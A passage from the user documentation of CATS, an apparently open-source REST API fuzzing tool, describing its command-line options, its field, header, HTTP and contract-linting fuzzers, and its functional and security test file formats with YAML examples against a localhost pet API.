  • > cats lint will run OpenAPI contract linters, also called ContractInfoFuzzers

Available arguments

  • --contract=LOCATION_OF_THE_CONTRACT supplies the location of the OpenApi or Swagger contract.
  • --server=URL supplies the URL of the service implementing the contract.
  • --basicauth=USR:PWD supplies a username:password pair, in case the service uses basic auth.
  • --fuzzers=LIST_OF_FUZZERS supplies a comma separated list of fuzzers. The supplied list of Fuzzers can be partial names, not full Fuzzer names. CATS which check for all Fuzzers containing the supplied strings. If the argument is not supplied, all fuzzers will be run.
  • --log=PACKAGE:LEVEL can configure custom log level for a given package. You can provide a comma separated list of packages and levels. This is helpful when you want to see full HTTP traffic: --log=org.apache.http.wire:debug or suppress CATS logging: --log=com.endava.cats:warn
  • --paths=PATH_LIST supplies a comma separated list of OpenApi paths to be tested. If no path is supplied, all paths will be considered.
  • --skipPaths=PATH_LIST a comma separated list of paths to ignore. If no path is supplied, no path will be ignored
  • --fieldsFuzzingStrategy=STRATEGY specifies which strategy will be used for field fuzzing. Available strategies are ONEBYONE, SIZE and POWERSET. More information on field fuzzing can be found in the sections below.
  • --maxFieldsToRemove=NUMBER specifies the maximum number of fields to be removed when using the SIZE fields fuzzing strategy.
  • --refData=FILE specifies the file containing static reference data which must be fixed in order to have valid business requests. This is a YAML file. It is explained further in the sections below.
  • --headers=FILE specifies a file containing headers that will be added when sending payloads to the endpoints. You can use this option to add oauth/JWT tokens for example.
  • --edgeSpacesStrategy=STRATEGY specifies how to expect the server to behave when sending trailing and prefix spaces within fields. Possible values are trimAndValidate and validateAndTrim.
  • --sanitizationStrategy=STRATEGY specifies how to expect the server to behave when sending Unicode Control Chars and Unicode Other Symbols within the fields. Possible values are sanitizeAndValidate and validateAndSanitize
  • --urlParams A comma separated list of 'name:value' pairs of parameters to be replaced inside the URLs. This is useful when you have static parameters in URLs (like 'version' for example).
  • --functionalFuzzerFile a file used by the FunctionalFuzzer that will be used to create user-supplied payloads.
  • --skipFuzzers=LIST_OF_FIZZERs a comma separated list of fuzzers that will be skipped for all paths. You can either provide full Fuzzer names (for example: --skippedFuzzers=VeryLargeStringsFuzzer) or partial Fuzzer names (for example: --skipFuzzers=VeryLarge). CATS will check if the Fuzzer names contains the string you provide in the arguments value.
  • --skipFields=field1,field2#subField1 a comma separated list of fields that will be skipped by replacement Fuzzers like EmptyStringsInFields, NullValuesInFields, etc.
  • --httpMethods=PUT,POST,etc a comma separated list of HTTP methods that will be used to filter which http methods will be executed for each path within the contract
  • --securityFuzzerFile A file used by the SecurityFuzzer that will be used to inject special strings in order to exploit possible vulnerabilities
  • --printExecutionStatistics If supplied (no value needed), prints a summary of execution times for each endpoint and HTTP method. By default this will print a summary for each endpoint: max, min and average. If you want detailed reports you must supply --printExecutionStatistics=detailed
  • --timestampReports If supplied (no value needed), it will output the report still inside the cats-report folder, but in a sub-folder with the current timestamp
  • --reportFormat=FORMAT Specifies the format of the CATS report. Supported formats: HTML_ONLY, HTML_JS or JUNIT. You can use HTML_ONLY if you want the report to not contain any Javascript. This is useful in CI environments due to Javascript content security policies. Default is HTML_JS which includes some sorting and filtering capabilities.
  • --useExamples If true (default value when not supplied) then CATS will use examples supplied in the OpenAPI contact. If false CATS will rely only on generated values
  • --checkFields If supplied (no value needed), it will only run the Field Fuzzers
  • --checkHeaders If supplied (no value needed), it will only run the Header Fuzzers
  • --checkHttp If supplied (no value needed), it will only run the HTTP Fuzzers
  • --includeWhitespaces If supplied (no value needed), it will include the Whitespaces Fuzzers
  • --includeEmojis If supplied (no value needed), it will include the Emojis Fuzzers
  • --includeControlChars If supplied (no value needed), it will include the ControlChars Fuzzers
  • --includeContract If supplied (no value needed), it will include ContractInfoFuzzers
  • --sslKeystore Location of the JKS keystore holding certificates used when authenticating calls using one-way or two-way SSL
  • --sslKeystorePwd The password of the sslKeystore
  • --sslKeyPwd The password of the private key from the sslKeystore
  • --proxyHost The proxy server's host name (if running behind proxy)
  • --proxyPort The proxy server's port number (if running behind proxy)
  • --maxRequestsPerMinute Maximum number of requests per minute; this is useful when APIs have rate limiting implemented; default is 10000
  • --connectionTimeout Time period in seconds which CATS should establish a connection with the server; default is 10 seconds
  • --writeTimeout Maximum time of inactivity in seconds between two data packets when sending the request to the server; default is 10 seconds
  • --readTimeout Maximum time of inactivity in seconds between two data packets when waiting for the server's response; default is 10 seconds
  • --dryRun If provided, it will simulate a run of the service with the supplied configuration. The run won't produce a report, but will show how many tests will be generated and run for each OpenAPI endpoint
  • --ignoreResponseCodes HTTP_CODES_LIST a comma separated list of HTTP response codes that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR. You can use response code families as 2xx, 4xx, etc. If provided, all Contract Fuzzers will be skipped.
  • --ignoreResponseSize SIZE_LIST a comma separated list of response sizes that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR
  • --ignoreResponseWords COUNT_LIST a comma separated list of words count in the response that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR
  • --ignoreResponseLines LINES_COUNT a comma separated list of lines count in the response that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR
  • --ignoreResponseRegex a REGEX that will match against the response that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR
  • --tests TESTS_LIST a comma separated list of executed tests in JSON format from the cats-report folder. If you supply the list without the .json extension CATS will search the test in the cats-report folder
  • --ignoreResponseCodeUndocumentedCheck If supplied (not value needed) it won't check if the response code received from the service matches the value expected by the fuzzer and will return the test result as SUCCESS instead of WARN
  • --ignoreResponseBodyCheck If supplied (not value needed) it won't check if the response body received from the service matches the schema supplied inside the contract and will return the test result as SUCCESS instead of WARN
  • --blackbox If supplied (no value needed) it will ignore all response codes except for 5XX which will be returned as ERROR. This is similar to --ignoreResponseCodes="2xx,4xx"
  • --contentType A custom mime type if the OpenAPI spec uses content type negotiation versioning.
  • --outoput The path where the CATS report will be written. Default is cats-report in the current directory
  • --skipReportingForIgnoredCodes Skip reporting entirely for the any ignored arguments provided in --ignoreResponseXXX
> cats --contract=my.yml --server=https://locathost:8080 --checkHeaders

This will run CATS against http://localhost:8080 using my.yml as an API spec and will only run the HTTP headers Fuzzers.

Available Fuzzers

To get a list of fuzzers run cats list --fuzzers. A list of all available fuzzers will be returned, along with a short description for each.

There are multiple categories of Fuzzers available:

  • Field Fuzzers which target request body fields or path parameters
  • Header Fuzzers which target HTTP headers
  • HTTP Fuzzers which target just the interaction with the service (without fuzzing fields or headers)

Additional checks which are not actually using any fuzzing, but leverage the CATS internal model of running the tests as Fuzzers:

  • ContractInfo Fuzzers which checks the contract for API good practices
  • Special Fuzzers a special category which need further configuration and are focused on more complex activities like functional flow, security testing or supplying your own request templates, rather than OpenAPI specs

Field Fuzzers

CATS has currently 42 registered Field Fuzzers:

  • BooleanFieldsFuzzer - iterate through each Boolean field and send random strings in the targeted field
  • DecimalFieldsLeftBoundaryFuzzer - iterate through each Number field (either float or double) and send requests with outside the range values on the left side in the targeted field
  • DecimalFieldsRightBoundaryFuzzer - iterate through each Number field (either float or double) and send requests with outside the range values on the right side in the targeted field
  • DecimalValuesInIntegerFieldsFuzzer - iterate through each Integer field and send requests with decimal values in the targeted field
  • EmptyStringValuesInFieldsFuzzer - iterate through each field and send requests with empty String values in the targeted field
  • ExtremeNegativeValueDecimalFieldsFuzzer - iterate through each Number field and send requests with the lowest value possible (-999999999999999999999999999999999999999999.99999999999 for no format, -3.4028235E38 for float and -1.7976931348623157E308 for double) in the targeted field
  • ExtremeNegativeValueIntegerFieldsFuzzer - iterate through each Integer field and send requests with the lowest value possible (-9223372036854775808 for int32 and -18446744073709551616 for int64) in the targeted field
  • ExtremePositiveValueDecimalFieldsFuzzer - iterate through each Number field and send requests with the highest value possible (999999999999999999999999999999999999999999.99999999999 for no format, 3.4028235E38 for float and 1.7976931348623157E308 for double) in the targeted field
  • ExtremePositiveValueInIntegerFieldsFuzzer - iterate through each Integer field and send requests with the highest value possible (9223372036854775807 for int32 and 18446744073709551614 for int64) in the targeted field
  • IntegerFieldsLeftBoundaryFuzzer - iterate through each Integer field and send requests with outside the range values on the left side in the targeted field
  • IntegerFieldsRightBoundaryFuzzer - iterate through each Integer field and send requests with outside the range values on the right side in the targeted field
  • InvalidValuesInEnumsFieldsFuzzer - iterate through each ENUM field and send invalid values
  • LeadingWhitespacesInFieldsTrimValidateFuzzer - iterate through each field and send requests with Unicode whitespaces and invisible separators prefixing the current value in the targeted field
  • LeadingControlCharsInFieldsTrimValidateFuzzer - iterate through each field and send requests with Unicode control chars prefixing the current value in the targeted field
  • LeadingSingleCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values prefixed with single code points emojis
  • LeadingMultiCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values prefixed with multi code points emojis
  • MaxLengthExactValuesInStringFieldsFuzzer - iterate through each String fields that have maxLength declared and send requests with values matching the maxLength size/value in the targeted field
  • MaximumExactValuesInNumericFieldsFuzzer - iterate through each Number and Integer fields that have maximum declared and send requests with values matching the maximum size/value in the targeted field
  • MinLengthExactValuesInStringFieldsFuzzer - iterate through each String fields that have minLength declared and send requests with values matching the minLength size/value in the targeted field
  • MinimumExactValuesInNumericFieldsFuzzer - iterate through each Number and Integer fields that have minimum declared and send requests with values matching the minimum size/value in the targeted field
  • NewFieldsFuzzer - send a 'happy' flow request and add a new field inside the request called 'catsFuzzyField'
  • NullValuesInFieldsFuzzer - iterate through each field and send requests with null values in the targeted field
  • OnlyControlCharsInFieldsTrimValidateFuzzer - iterate through each field and send values with control chars only
  • OnlyWhitespacesInFieldsTrimValidateFuzzer - iterate through each field and send values with unicode separators only
  • OnlySingleCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values with single code point emojis only
  • OnlyMultiCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values with multi code point emojis only
  • RemoveFieldsFuzzer - iterate through each request fields and remove certain fields according to the supplied 'fieldsFuzzingStrategy'
  • StringFieldsLeftBoundaryFuzzer - iterate through each String field and send requests with outside the range values on the left side in the targeted field
  • StringFieldsRightBoundaryFuzzer - iterate through each String field and send requests with outside the range values on the right side in the targeted field
  • StringFormatAlmostValidValuesFuzzer - iterate through each String field and get its 'format' value (i.e. email, ip, uuid, date, datetime, etc); send requests with values which are almost valid (i.e. [email protected] for email, 888.1.1. for ip, etc) in the targeted field
  • StringFormatTotallyWrongValuesFuzzer - iterate through each String field and get its 'format' value (i.e. email, ip, uuid, date, datetime, etc); send requests with values which are totally wrong (i.e. abcd for email, 1244. for ip, etc) in the targeted field
  • StringsInNumericFieldsFuzzer - iterate through each Integer (int, long) and Number field (float, double) and send requests having the fuzz string value in the targeted field
  • TrailingWhitespacesInFieldsTrimValidateFuzzer - iterate through each field and send requests with trailing with Unicode whitespaces and invisible separators in the targeted field
  • TrailingControlCharsInFieldsTrimValidateFuzzer - iterate through each field and send requests with trailing with Unicode control chars in the targeted field
  • TrailingSingleCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values trailed with single code point emojis
  • TrailingMultiCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values trailed with multi code point emojis
  • VeryLargeStringsFuzzer - iterate through each String field and send requests with very large values (40000 characters) in the targeted field
  • WithinControlCharsInFieldsSanitizeValidateFuzzer - iterate through each field and send values containing unicode control chars
  • WithinSingleCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values containing single code point emojis
  • WithinMultiCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values containing multi code point emojis
  • ZalgoTextInStringFieldsValidateSanitizeFuzzer - iterate through each field and send values containing zalgo text

You can run only these Fuzzers by supplying the --checkFields argument.

Header Fuzzers

CATS has currently 28 registered Header Fuzzers:

  • AbugidasCharsInHeadersFuzzer - iterate through each header and send requests with abugidas chars in the targeted header
  • CheckSecurityHeadersFuzzer - check all responses for good practices around Security related headers like: [{name=Cache-Control, value=no-store}, {name=X-XSS-Protection, value=1; mode=block}, {name=X-Content-Type-Options, value=nosniff}, {name=X-Frame-Options, value=DENY}]
  • DummyAcceptHeadersFuzzer - send a request with a dummy Accept header and expect to get 406 code
  • DummyContentTypeHeadersFuzzer - send a request with a dummy Content-Type header and expect to get 415 code
  • DuplicateHeaderFuzzer - send a 'happy' flow request and duplicate an existing header
  • EmptyStringValuesInHeadersFuzzer - iterate through each header and send requests with empty String values in the targeted header
  • ExtraHeaderFuzzer - send a 'happy' flow request and add an extra field inside the request called 'Cats-Fuzzy-Header'
  • LargeValuesInHeadersFuzzer - iterate through each header and send requests with large values in the targeted header
  • LeadingControlCharsInHeadersFuzzer - iterate through each header and prefix values with control chars
  • LeadingWhitespacesInHeadersFuzzer - iterate through each header and prefix value with unicode separators
  • LeadingSpacesInHeadersFuzzer - iterate through each header and send requests with spaces prefixing the value in the targeted header
  • RemoveHeadersFuzzer - iterate through each header and remove different combinations of them
  • OnlyControlCharsInHeadersFuzzer - iterate through each header and replace value with control chars
  • OnlySpacesInHeadersFuzzer - iterate through each header and replace value with spaces
  • OnlyWhitespacesInHeadersFuzzer - iterate through each header and replace value with unicode separators
  • TrailingSpacesInHeadersFuzzer - iterate through each header and send requests with trailing spaces in the targeted header \
  • TrailingControlCharsInHeadersFuzzer - iterate through each header and trail values with control chars
  • TrailingWhitespacesInHeadersFuzzer - iterate through each header and trail values with unicode separators
  • UnsupportedAcceptHeadersFuzzer - send a request with an unsupported Accept header and expect to get 406 code
  • UnsupportedContentTypesHeadersFuzzer - send a request with an unsupported Content-Type header and expect to get 415 code
  • ZalgoTextInHeadersFuzzer - iterate through each header and send requests with zalgo text in the targeted header

You can run only these Fuzzers by supplying the --checkHeaders argument.

HTTP Fuzzers

CATS has currently 6 registered HTTP Fuzzers:

  • BypassAuthenticationFuzzer - check if an authentication header is supplied; if yes try to make requests without it
  • DummyRequestFuzzer - send a dummy json request {'cats': 'cats'}
  • HappyFuzzer - send a request with all fields and headers populated
  • HttpMethodsFuzzer - iterate through each undocumented HTTP method and send an empty request
  • MalformedJsonFuzzer - send a malformed json request which has the String 'bla' at the end
  • NonRestHttpMethodsFuzzer - iterate through a list of HTTP method specific to the WebDav protocol that are not expected to be implemented by REST APIs

You can run only these Fuzzers by supplying the --checkHttp argument.

ContractInfo Fuzzers or OpenAPI Linters

Usually a good OpenAPI contract must follow several good practices in order to make it easy digestible by the service clients and act as much as possible as self-sufficient documentation:

  • follow good practices around naming the contract elements like paths, requests, responses
  • always use plural for the path names, separate paths words through hyphens/underscores, use camelCase or snake_case for any json types and properties
  • provide tags for all operations in order to avoid breaking code generation on some languages and have a logical grouping of the API operations
  • provide good description for all paths, methods and request/response elements
  • provide meaningful responses for POST, PATCH and PUT requests
  • provide examples for all requests/response elements
  • provide structural constraints for (ideally) all request/response properties (min, max, regex)
  • heaver some sort of CorrelationIds/TraceIds within headers
  • have at least a security schema in place
  • avoid having the API version part of the paths
  • document response codes for both "happy" and "unhappy" flows
  • avoid using xml payload unless there is a really good reason (like documenting an old API for example)
  • json types and properties do not use the same naming (like having a Pet with a property named pet)

CATS has currently 9 registered ContractInfo Fuzzers:

  • HttpStatusCodeInValidRangeFuzzer - verifies that all HTTP response codes are within the range of 100 to 599
  • NamingsContractInfoFuzzer - verifies that all OpenAPI contract elements follow REST API naming good practices
  • PathTagsContractInfoFuzzer - verifies that all OpenAPI paths contain tags elements and checks if the tags elements match the ones declared at the top level
  • RecommendedHeadersContractInfoFuzzer - verifies that all OpenAPI contract paths contain recommended headers like: CorrelationId/TraceId, etc.
  • RecommendedHttpCodesContractInfoFuzzer - verifies that the current path contains all recommended HTTP response codes for all operations
  • SecuritySchemesContractInfoFuzzer - verifies if the OpenApi contract contains valid security schemas for all paths, either globally configured or per path
  • TopLevelElementsContractInfoFuzzer - verifies that all OpenAPI contract level elements are present and provide meaningful information: API description, documentation, title, version, etc.
  • VersionsContractInfoFuzzer - verifies that a given path doesn't contain versioning information
  • XmlContentTypeContractInfoFuzzer - verifies that all OpenAPI contract paths responses and requests does not offer application/xml as a Content-Type

You can run only these Fuzzers using > cats lint --contract=CONTRACT.

Special Fuzzers

FunctionalFuzzer

Writing Custom Tests

You can leverage CATS super-powers of self-healing and payload generation in order to write functional tests. This is achieved using the so called FunctionaFuzzer, which is not a Fuzzer per se, but was named as such for consistency. The functional tests are written in a YAML file using a simple DSL. The DSL supports adding identifiers, descriptions, assertions as well as passing variables between tests. The cool thing is that, by leveraging the fact that CATS generates valid payload, you only need to override values for specific fields. The rest of the information will be populated by CATS using valid data, just like a 'happy' flow request.

It's important to note that reference data won't get replaced when using the FunctionalFuzzer. So if there are reference data fields, you must also supply those in the FunctionalFuzzer.

The FunctionalFuzzer will only trigger if a valid functionalFuzzer.yml file is supplied. The file has the following syntax:

/path:
testNumber:
description: Short description of the test
prop: value
prop#subprop: value
prop7:
- value1
- value2
- value3
oneOfSelection:
element#type: "Value"
expectedResponseCode: HTTP_CODE
httpMethod: HTTP_NETHOD

And a typical run will look like:

> cats run functionalFuzzer.yml -c contract.yml -s http://localhost:8080

This is a description of the elements within the functionalFuzzer.yml file:

  • you can supply a description of the test. This will be set as the Scenario description. If you don't supply a description the testNumber will be used instead.
  • you can have multiple tests under the same path: test1, test2, etc.
  • expectedResponseCode is mandatory, otherwise the Fuzzer will ignore this test. The expectedResponseCode tells CATS what to expect from the service when sending this test.
  • at most one of the properties can have multiple values. When this situation happens, that test will actually become a list of tests one for each of the values supplied. For example in the above example prop7 has 3 values. This will actually result in 3 tests, one for each value.
  • test within the file are executed in the declared order. This is why you can have outputs from one test act as inputs for the next one(s) (see the next section for details).
  • if the supplied httpMethod doesn't exist in the OpenAPI given path, a warning will be issued and no test will be executed
  • if the supplied httpMethod is not a valid HTTP method, a warning will be issued and no test will be executed
  • if the request payload uses a oneOf element to allow multiple request types, you can control which of the possible types the FunctionalFuzzer will apply to using the oneOfSelection keyword. The value of the oneOfSelection keyword must match the fully qualified name of the discriminator.
  • if no oneOfSelection is supplied, and the request payload accepts multiple oneOf elements, than a custom test will be created for each type of payload
  • the file uses Json path syntax for all the properties you can supply; you can separate elements through # as in the example above instead of .

Dealing with oneOf, anyOf

When you have request payloads which can take multiple object types, you can use the oneOfSelection keyword to specify which of the possible object types is required by the FunctionalFuzzer. If you don't provide this element, all combinations will be considered. If you supply a value, this must be exactly the one used in the discriminator.

Correlating Tests

As CATs mostly relies on generated data with small help from some reference data, testing complex business scenarios with the pre-defined Fuzzers is not possible. Suppose we have an endpoint that creates data (doing a POST), and we want to check its existence (via GET). We need a way to get some identifier from the POST call and send it to the GET call. This is now possible using the FunctionalFuzzer. The functionalFuzzerFile can have an output entry where you can state a variable name, and its fully qualified name from the response in order to set its value. You can then refer the variable using ${variable_name} from another test in order to use its value.

Here is an example:

/pet:
test_1:
description: Create a Pet
httpMethod: POST
name: "My Pet"
expectedResponseCode: 200
output:
petId: pet#id
/pet/{id}:
test_2:
description: Get a Pet
id: ${petId}
expectedResponseCode: 200

Suppose the test_1 execution outputs:

{
"pet":
{
"id" : 2
}
}

When executing test_1 the value of the pet id will be stored in the petId variable (value 2). When executing test_2 the id parameter will be replaced with the petId variable (value 2) from the previous case.

Please note: variables are visible across all custom tests; please be careful with the naming as they will get overridden.

Verifying responses

The FunctionalFuzzer can verify more than just the expectedResponseCode. This is achieved using the verify element. This is an extended version of the above functionalFuzzer.yml file.

/pet:
test_1:
description: Create a Pet
httpMethod: POST
name: "My Pet"
expectedResponseCode: 200
output:
petId: pet#id
verify:
pet#name: "Baby"
pet#id: "[0-9]+"
/pet/{id}:
test_2:
description: Get a Pet
id: ${petId}
expectedResponseCode: 200

Considering the above file:

  • the FunctionalFuzzer will check if the response has the 2 elements pet#name and pet#id
  • if the elements are found, it will check that the pet#name has the Baby value and that the pet#id is numeric

The following json response will pass test_1:

{
"pet":
{
"id" : 2,
"name": "Baby"
}
}

But this one won't (pet#name is missing):

{
"pet":
{
"id" : 2
}
}

You can also refer to request fields in the verify section by using the ${request#..} qualifier. Using the above example, by having the following verify section:

/pet:
test_1:
description: Create a Pet
httpMethod: POST
name: "My Pet"
expectedResponseCode: 200
output:
petId: pet#id
verify:
pet#name: "${request#name}"
pet#id: "[0-9]+"

It will verify if the response contains a pet#name element and that its value equals My Pet as sent in the request.

Some notes:

  • verify parameters support Java regexes as values
  • you can supply more than one parameter to check (as seen above)
  • if at least one of the parameters is not present in the response, CATs will report an error
  • if all parameters are found and have valid values, but the response code is not matched, CATs will report a warning
  • if all the parameters are found and match their values, and the response code is as expected, CATs will report a success

Working with additionalProperties in FunctionalFuzzer

You can also set additionalProperties fields through the functionalFuzzerFile using the same syntax as for Setting additionalProperties in Reference Data.

FunctionalFuzzer Reserved keywords

The following keywords are reserved in FunctionalFuzzer tests: output, expectedResponseCode, httpMethod, description, oneOfSelection, verify, additionalProperties, topElement and mapValues.

Security Fuzzer

Although CATs is not a security testing tool, you can use it to test basic security scenarios by fuzzing specific fields with different sets of nasty strings. The behaviour is similar to the FunctionalFuzzer. You can use the exact same elements for output variables, test correlation, verify responses and so forth, with the addition that you must also specify a targetFields and/or targetFieldTypes and a stringsList element. A typical securityFuzzerFile will look like this:

/pet:
test_1:
description: Run XSS scenarios
name: "My Pet"
expectedResponseCode: 200
httpMethod: all
targetFields:
- pet#id
- pet#description
stringsFile: xss.txt

And a typical run:

> cats run securityFuzzerFile.yml -c contract.yml -s http://localhost:8080

You can also supply output, httpMethod, oneOfSelection and/or verify (with the same behaviour as within the FunctionalFuzzer) if they are relevant to your case.

The file uses Json path syntax for all the properties you can supply; you can separate elements through # as in the example instead of ..

This is what the SecurityFuzzer will do after parsing the above securityFuzzerFile:

  • it will add the fixed value "My Pet" to all the request for the field name
  • for each field specified in the targetFields i.e. pet#id and pet#description it will create requests for each line from the xss.txt file and supply those values in each field
  • if you consider the xss.txt sample file included in the CATs repo, this means that it will send 21 requests targeting pet#id and 21 requests targeting pet#description i.e. a total of 42 tests
  • for each of these 42 tests, the SecurityFuzzer will expect a 200 response code. If another response code is returned, then CATs will report the test as error.

If you want the above logic to apply to all paths, you can use all as the path name:

all:
test_1:
description: Run XSS scenarios
name: "My Pet"
expectedResponseCode: 200
httpMethod: all
targetFields:
- pet#id
- pet#description
stringsFile: xss.txt

Instead of specifying the field names, you can broader to scope to target certain fields types. For example, if we want to test for XSS in all string fields, you can have the following securityFuzzerFile:

all:
test_1:
description: Run XSS scenarios
name: "My Pet"
expectedResponseCode: 200
httpMethod: all
targetFieldTypes:
- string
stringsFile: xss.txt

As an idea on how to create security tests, you can split the nasty strings into multiple files of interest in your particular context. You can have a sql_injection.txt, a xss.txt, a command_injection.txt and so on. For each of these files, you can create a test entry in the securityFuzzerFile where you include the fields you think are meaningful for these types of tests. (It was a deliberate choice (for now) to not include all fields by default.) The expectedResponseCode should be tweaked according to your particular context. Your service might sanitize data before validation, so might be perfectly valid to expect a 200 or might validate the fields directly, so might be perfectly valid to expect a 400. A 500 will usually mean something was not handled properly and might signal a possible bug.

Working with additionalProperties in SecurityFuzzer

You can also set additionalProperties fields through the functionalFuzzerFile using the same syntax as for Setting additionalProperties in Reference Data.

SecurityFuzzer Reserved keywords

The following keywords are reserved in SecurityFuzzer tests: output, expectedResponseCode, httpMethod, description, verify, oneOfSelection, targetFields, targetFieldTypes, stringsFile, additionalProperties, topElement and mapValues.

TemplateFuzzer

The TemplateFuzzer can be used to fuzz non-OpenAPI endpoints. If the target API does not have an OpenAPI spec available, you can use a request template to run a limited set of fuzzers. The syntax for running the TemplateFuzzer is as follows (very similar to curl:

> cats fuzz -H header=value -X POST -d '{"field1":"value1","field2":"value2","field3":"value3"}' -t "field1,field2,header" -i "2XX,4XX" http://service-url 

The command will:

  • send a POST request to http://service-url
  • use the {"field1":"value1","field2":"value2","field3":"value3"} as a template
  • replace one by one field1,field2,header with fuzz data and send each request to the service endpoint
  • ignore 2XX,4XX response codes and report an error when the received response code is not in this list

It was a deliberate choice to limit the fields for which the Fuzzer will run by supplying them using the -t argument. For nested objects, supply fully qualified names: field.subfield.

Headers can also be fuzzed using the same mechanism as the fields.

This Fuzzer will send the following type of data:

  • null values
  • empty values
  • zalgo text
  • abugidas characters
  • large random unicode data
  • very large strings (80k characters)
  • single and multi code point emojis
  • unicode control characters
  • unicode separators
  • unicode whitespaces

For a full list of options run > cats fuzz -h.

You can also supply your own dictionary of data using the -w file argument.

HTTP methods with bodies will only be fuzzed at the request payload and headers level.

HTTP methods without bodies will be fuzzed at path and query parameters and headers level. In this case you don't need to supply a -d argument.

This is an example for a GET request:

> cats fuzz -X GET -t "path1,query1" -i "2XX,4XX" http://service-url/paths1?query1=test&query2

Reference Data File

There are often cases where some fields need to contain relevant business values in order for a request to succeed. You can provide such values using a reference data file specified by the --refData argument. The reference data file is a YAML-format file that contains specific fixed values for different paths in the request document. The file structure is as follows:

/path/0.1/auth:
prop#subprop: 12
prop2: 33
prop3#subprop1#subprop2: "test"
/path/0.1/cancel:
prop#test: 1

For each path you can supply custom values for properties and sub-properties which will have priority over values supplied by any other Fuzzer. Consider this request payload:

{
"address": {
"phone": "123",
"postCode": "408",
"street": "cool street"
},
"name": "Joe"
}

and the following reference data file file:

/path/0.1/auth:
address#street: "My Street"
name: "John"

This will result in any fuzzed request to the /path/0.1/auth endpoint being updated to contain the supplied fixed values:

{
"address": {
"phone": "123",
"postCode": "408",
"street": "My Street"
},
"name": "John"
}

The file uses Json path syntax for all the properties you can supply; you can separate elements through # as in the example above instead of ..

You can use environment (system) variables in a ref data file using: $$VARIABLE_NAME. (notice double $$)

Setting additionalProperties

As additional properties are maps i.e. they don't actually have a structure, CATS cannot currently generate valid values. If the elements within such a data structure are essential for a request, you can supply them via the refData file using the following syntax:

/path/0.1/auth:
address#street: "My Street"
name: "John"
additionalProperties:
topElement: metadata
mapValues:
test: "value1"
anotherTest: "value2"

The additionalProperties element must contain the actual key-value pairs to be sent within the requests and also a top element if needed. topElement is not mandatory. The above example will output the following json (considering also the above examples):

{
"address": {
"phone": "123",
"postCode": "408",
"street": "My Street"
},
"name": "John",
"metadata": {
"test": "value1",
"anotherTest": "value2"
}
}

RefData reserved keywords

The following keywords are reserved in a reference data file: additionalProperties, topElement and mapValues.

Sending ref data for ALL paths

You can also have the ability to send the same reference data for ALL paths (just like you do with the headers). You can achieve this by using all as a key in the refData file:

all:
address#zip: 123

This will try to replace address#zip in all requests (if the field is present).

Removing fields

There are (rare) cases when some fields may not make sense together. Something like: if you send firstName and lastName, you are not allowed to also send name. As OpenAPI does not have the capability to send request fields which are dependent on each other, you can use the refData file to instruct CATS to remove fields before sending a request to the service. You can achieve this by using the cats_remove_field as a value for the fields you want to remove. For the above case the refData field will look as follows:

all:
name: "cats_remove_field"

Creating a Ref Data file with the FunctionalFuzzer

You can leverage the fact that the FunctionalFuzzer can run functional flows in order to create dynamic --refData files which won't need manual setting the reference data values. The --refData file must be created with variables ${variable} instead of fixed values and those variables must be output variables in the functionalFuzzer.yml file. In order for the FunctionalFuzzer to properly replace the variables names with their values you must supply the --refData file as an argument when the FunctionalFuzzer runs.

> cats run functionalFuzzer.yml -c contract.yml -s http://localhost:8080 --refData=refData.yml

The functionalFuzzer.yml file:

/pet:
test_1:
description: Create a Pet
httpMethod: POST
name: "My Pet"
expectedResponseCode: 200
output:
petId: pet#id

The refData.yml file:

/pet-type:
id: ${petId}

After running CATS using the command and the 2 files above, you will get a refData_replace.yml file where the id will get the value returned into the petId variable.

The refData_replaced.yml:

/pet-type:
id: 123

You can now use the refData_replaced.yml as a --refData file for running CATS with the rest of the Fuzzers.

Headers File

This can be used to send custom fixed headers with each payload. It is useful when you have authentication tokens you want to use to authenticate the API calls. You can use path specific headers or common headers that will be added to each call using an all element. Specific paths will take precedence over the all element. Sample headers file:

all:
Accept: application/json
/path/0.1/auth:
jwt: XXXXXXXXXXXXX
/path/0.2/cancel:
jwt: YYYYYYYYYYYYY

This will add the Accept header to all calls and the jwt header to the specified paths. You can use environment (system) variables in a headers file using: $$VARIABLE_NAME. (notice double $$)

DELETE requests

DELETE is the only HTTP verb that is intended to remove resources and executing the same DELETE request twice will result in the second one to fail as the resource is no longer available. It will be pretty heavy to supply a large list of identifiers within the --refData file and this is why the recommendation was to skip the DELETE method when running CATS.

But starting with version 7.0.2 CATS has some intelligence in dealing with DELETE. In order to have enough valid entities CATS will save the corresponding POST requests in an internal Queue, and everytime a DELETE request it will be executed it will poll data from there. In order to have this actually working, your contract must comply with common sense conventions:

  • the DELETE path is actually the POST path plus an identifier: if POST is /pets, then DELETE is expected to be /pets/{petId}.
  • CATS will try to match the {petId} parameter within the body returned by the POST request while doing various combinations of the petId name. It will try to search for the following entries: petId, id, pet-id, pet_id with different cases.
  • If any of those entries is found within a stored POST result, it will replace the {petId} with that value

For example, suppose that a POST to /pets responds with:

{
"pet_id": 2,
"name": "Chuck"
}

When doing a DELETE request, CATS will discover that {petId} and pet_id are used as identifiers for the Pet resource, and will do the DELETE at /pets/2.

If these conventions are followed (which also align to good REST naming practices), it is expected that DELETE and POSTrequests will be on-par for most of the entities.

Content Negotiation

Some APIs might use content negotiation versioning which implies formats like application/v11+json in the Accept header.

You can handle this in CATS as follows:

  • if the OpenAPI contract defines its content as:
 requestBody:
required: true
content:
application/v5+json:
schema:
$ref: '#/components/RequestV5'
application/v6+json:
schema:
$ref: '#/components/RequestV6'

by having clear separation between versions, you can pass the --contentType argument with the version you want to test: cats ... --contentType="application/v6+json".

If the OpenAPI contract is not version aware (you already exported it specific to a version) and the content looks as:

 requestBody:
required: true
content:
application/json:
schema:
$ref: '#/components/RequestV5'

and you still need to pass the application/v5+json Accept header, you can use the --headers file to add it:

all:
Accept: "application/v5+json"

Edge Spaces Strategy

